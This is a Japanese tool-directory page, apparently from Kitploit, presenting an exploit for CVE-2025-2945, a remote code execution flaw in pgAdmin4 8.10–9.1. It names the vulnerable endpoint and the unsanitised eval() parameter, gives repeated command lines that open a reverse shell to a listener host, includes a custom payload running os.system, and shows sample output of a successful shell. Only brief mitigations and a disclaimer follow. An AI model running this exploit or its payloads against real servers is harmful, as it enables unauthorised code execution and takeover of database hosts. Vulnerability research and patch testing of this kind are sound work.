Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-2945 — バージョン8.10から9.1に影響するpgAdmin4のリモートコード実行(RCE)脆弱性に対するエクスプロイト。 | Kitploit
ツール/GitHubGitHub/g0d150ne/cve-2025-2945
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubg0d150ne/cve-2025-2945

CVE-2025-2945

バージョン8.10から9.1に影響するpgAdmin4のリモートコード実行(RCE)脆弱性に対するエクスプロイト。

リポジトリを見る
429日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-2945 - pgAdmin4 認証済みRCEエクスプロイト

作者: G0D150NE バージョン: 2.0.0
CVE: CVE-2025-2945
深刻度: 重大 (CVSS 9.9)

📌 説明

バージョン 8.10〜9.1 に影響する pgAdmin4 リモートコード実行 (RCE) の脆弱性に対するエクスプロイトです。

この脆弱性は /sqleditor/query_tool/download エンドポイントに存在し、query_commited パラメータがサニタイズされずに Python の eval() 関数へ渡されるため、任意のコード実行が可能になります。

⚡ 機能

  • ✅ 自動バージョン検出
  • ✅ 複数のソースからのCSRFトークン収集
  • ✅ サーバー/グループIDの列挙
  • ✅ リバースシェルペイロード (base64エンコード)
  • ✅ カスタムペイロードのサポート
  • ✅ 詳細デバッグモード
  • ✅ カラフルなコンソール出力
  • ✅ SSL検証のバイパス

🚀 インストール

root@kitploit:~
# Clone or download the script
git clone https://github.com/g0d150ne/CVE-2025-2945
cd CVE-2025-2945

# Install dependencies
pip install requests

🎯 使用方法

基本的な使い方

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

詳細出力付き

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  -v

カスタムペイロード

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --custom-payload "__import__('os').system('whoami > /tmp/test.txt')"

バージョンチェックをスキップ

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --skip-version-check

📊 引数

引数 必須 説明 --target-url Yes pgAdmin4 のベースURL (http://RHOST:PORT/) --username Yes pgAdmin4 のログインメールアドレス --password Yes pgAdmin4 のログインパスワード --db-user Yes データベースのユーザー名 --db-pass Yes データベースのパスワード --db-name Yes データベース名 --Rhost Yes リバースシェル用リスナーのIPアドレス --Rport Yes リバースシェル用リスナーのポート --max-server-id No スキャンする最大サーバーID (デフォルト: 10) --skip-version-check No バージョン検証をスキップ --custom-payload No カスタムPythonペイロード --verbose, -v No デバッグ出力を有効化 --no-banner No バナーを非表示

📋 要件

· Python 3.6+ · requests ライブラリ

root@kitploit:~
pip install requests

🧪 テスト環境

root@kitploit:~
# Docker pgAdmin vulnerable version
docker run -d -p 5050:5050 \
  -e [email protected] \
  -e PGADMIN_DEFAULT_PASSWORD=admin123 \
  dpage/pgadmin4:8.10

# Then run the exploit
python3 poc.py \
  --target-url http://localhost:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

🖥️ 出力例

root@kitploit:~
   ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ 
  ▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌          
  ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌          
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░▌          
   ▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌▐░▌          
            ▐░▌▐░▌       ▐░▌▐░▌       ▐░▌          ▐░▌▐░▌          
   ▄▄▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄█░▌ ▄▄▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
   ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀ 
   
   CVE-2025-2945 - pgAdmin4 Authenticated RCE
   Author: G0D150NE
   Version: 2.0.0

[*] Target running vulnerable version 8.10
[*] Authenticating as [email protected]...
[+] Authentication successful
[*] Scanning for valid server (SGID: 7, max: 10)...
[+] Found valid server (SGID: 7, SID: 1)
[*] Initializing SQL editor (trans_id: 4827193)...
[+] SQL editor initialized
[*] Reverse shell payload to 10.10.14.7:4444
[*] Sending payload...
[+] Payload delivered (HTTP 500)
[*] Check listener at your endpoint
[+] Exploit successful!
[*] Check reverse shell on 10.10.14.7:4444

🛡️ 緩和策

· pgAdmin4 をバージョン 9.2 以降にアップグレードする · pgAdmin インターフェースへのアクセスを制限する · 強力な認証情報を使用する · 利用可能な場合は MFA を有効にする

⚠️ 免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみで使用してください。明示的な許可なくシステムに対して使用することは違法です。作者は、いかなる不正使用についても責任を負いません。

🔗 参照

· CVE-2025-2945 · pgAdmin セキュリティアドバイザリ

📄 ライセンス

MIT ライセンス

ツールをダウンロード